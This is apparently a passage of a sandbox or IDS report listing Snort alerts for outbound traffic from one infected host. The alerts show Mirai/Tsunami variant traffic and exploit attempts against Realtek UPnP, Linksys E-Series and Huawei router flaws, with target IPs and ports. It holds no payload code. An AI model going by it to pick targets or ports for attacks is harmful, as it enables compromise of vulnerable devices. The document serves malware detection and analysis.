    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40742 -> 156.226.103.188:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55974 -> 172.245.84.201:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33864 -> 172.65.246.86:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55462 -> 172.65.115.180:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34900 -> 95.245.84.157:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50730 -> 156.225.159.182:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48646 -> 95.101.71.29:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36138 -> 172.65.231.189:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56510 -> 172.65.226.94:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41482 -> 172.65.179.4:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36878 -> 172.65.46.167:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48764 -> 95.168.58.16:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56526 -> 95.213.40.5:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46118 -> 95.100.182.65:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33166 -> 172.65.134.9:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45570 -> 156.250.91.131:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57116 -> 156.234.231.229:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40608 -> 95.170.196.184:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37104 -> 172.247.3.225:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:32974 -> 95.159.55.164:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60034 -> 95.159.0.203:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57738 -> 95.56.217.140:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51110 -> 95.212.135.172:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41018 -> 95.189.104.138:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48116 -> 172.65.100.58:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57824 -> 172.65.153.75:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43432 -> 95.217.20.83:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46056 -> 95.100.69.121:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34720 -> 156.226.54.94:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50126 -> 95.110.156.28:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39084 -> 172.65.187.125:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34562 -> 95.165.133.145:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54778 -> 172.65.102.111:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35052 -> 172.65.109.2:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51928 -> 172.255.81.249:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50540 -> 95.209.146.210:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44390 -> 156.254.47.99:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50650 -> 172.65.163.133:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42544 -> 172.65.1.208:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40212 -> 95.159.23.54:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37572 -> 95.216.14.216:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59122 -> 156.244.73.209:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59868 -> 95.100.114.235:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55028 -> 95.51.20.50:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52370 -> 112.164.248.243:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51170 -> 112.211.168.70:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54336 -> 95.249.69.126:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39030 -> 95.56.253.89:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40106 -> 156.224.25.142:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60120 -> 156.244.68.201:52869
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37294 -> 172.65.99.89:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47764 -> 172.65.106.43:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42736 -> 172.65.233.120:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50858 -> 172.65.31.189:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53180 -> 172.65.225.39:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47618 -> 172.245.10.47:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51920 -> 95.159.50.85:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53748 -> 95.101.175.109:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45804 -> 95.9.211.134:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45916 -> 95.67.254.8:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35856 -> 172.65.21.155:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46890 -> 172.65.98.68:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37828 -> 172.65.60.102:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33940 -> 172.65.249.48:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58972 -> 172.65.182.102:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59304 -> 98.159.33.50:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49154 -> 95.58.157.140:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35036 -> 172.65.200.11:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:45536 -> 172.65.146.58:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49556 -> 172.65.254.28:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44332 -> 172.65.119.246:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38594 -> 95.227.197.138:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59092 -> 172.65.100.22:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49052 -> 172.65.126.215:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54932 -> 172.81.132.230:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48988 -> 172.245.250.142:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42834 -> 95.217.135.243:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38814 -> 172.65.148.205:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56926 -> 95.159.33.214:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43526 -> 95.88.166.60:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45990 -> 95.255.123.231:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47404 -> 95.100.113.205:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38146 -> 95.211.116.27:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58436 -> 172.65.218.199:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38194 -> 156.226.77.149:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59512 -> 95.166.198.5:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40064 -> 95.100.124.219:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35126 -> 95.100.221.4:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40644 -> 95.215.239.146:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44174 -> 172.65.126.204:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37238 -> 112.162.42.65:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50322 -> 112.169.202.100:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52622 -> 172.65.227.114:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42672 -> 172.65.109.124:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50246 -> 172.65.246.55:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39598 -> 184.175.126.201:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:40446 -> 172.255.83.91:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49970 -> 95.71.190.163:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:38330 -> 172.65.157.119:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37548 -> 172.65.28.188:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53072 -> 172.65.55.165:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48362 -> 172.65.177.82:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37196 -> 98.159.224.19:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58028 -> 95.211.3.47:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50126 -> 95.136.115.74:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47170 -> 95.58.75.108:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34772 -> 95.67.236.104:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48226 -> 197.237.77.45:37215
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33744 -> 95.107.229.36:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47180 -> 172.65.208.221:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58680 -> 172.65.152.195:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50134 -> 172.65.64.45:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51608 -> 156.241.97.193:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48200 -> 156.238.49.121:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54962 -> 95.101.234.78:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58986 -> 95.179.190.178:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53452 -> 95.173.188.17:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53648 -> 95.141.209.237:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34894 -> 95.205.43.210:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37460 -> 172.65.235.159:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48246 -> 172.65.150.232:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52018 -> 95.158.35.5:80
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54780 -> 156.244.124.62:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47180 -> 95.159.7.39:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45406 -> 95.130.153.194:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36364 -> 95.168.248.174:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41450 -> 95.180.163.75:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:55652 -> 172.65.68.121:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42126 -> 95.217.140.52:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58958 -> 95.37.132.190:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53848 -> 95.100.240.226:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39670 -> 172.65.245.89:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54750 -> 95.166.120.72:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48052 -> 95.67.139.30:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55858 -> 95.216.249.180:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38884 -> 95.197.61.81:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59840 -> 95.103.94.78:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45412 -> 95.205.61.159:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47868 -> 95.123.96.92:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33690 -> 172.65.187.118:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59892 -> 172.65.215.115:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52794 -> 95.56.128.199:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45874 -> 95.213.201.60:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39622 -> 172.65.93.255:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41418 -> 172.65.217.214:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50334 -> 95.159.30.92:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33610 -> 95.142.64.151:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57278 -> 95.87.254.43:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52754 -> 95.85.55.72:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50832 -> 95.101.242.104:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59362 -> 95.217.35.160:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48522 -> 95.213.235.224:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50396 -> 95.57.74.33:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34682 -> 95.101.22.163:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38146 -> 95.216.22.203:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60996 -> 95.217.152.91:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34830 -> 172.65.70.156:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53372 -> 172.65.158.247:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41284 -> 172.65.211.114:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:59670 -> 172.65.174.79:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60354 -> 172.65.48.204:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33580 -> 95.179.134.154:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51360 -> 95.159.56.229:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43836 -> 172.65.97.128:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:58740 -> 172.65.223.177:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59572 -> 95.56.139.94:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39652 -> 95.31.137.231:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36450 -> 95.217.181.95:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44420 -> 95.65.90.207:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40528 -> 95.129.58.148:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33410 -> 95.142.201.73:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52402 -> 95.143.204.238:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42360 -> 95.217.173.176:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37200 -> 95.164.215.28:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41832 -> 95.252.56.125:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57714 -> 95.131.149.114:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39220 -> 95.100.193.209:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57406 -> 95.179.156.25:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58308 -> 95.79.119.172:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39318 -> 112.106.58.150:80
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:45514 -> 172.65.156.129:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:47748 -> 172.65.121.194:55555
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33852 -> 156.250.21.9:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51336 -> 156.241.119.167:52869
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53664 -> 95.100.65.94:80
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53566 -> 197.246.194.226:37215
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55030 -> 95.130.41.57:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33216 -> 95.214.235.126:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50666 -> 95.217.100.90:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57540 -> 95.100.125.231:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40704 -> 95.101.159.235:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43592 -> 95.76.255.195:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50612 -> 95.101.41.243:80
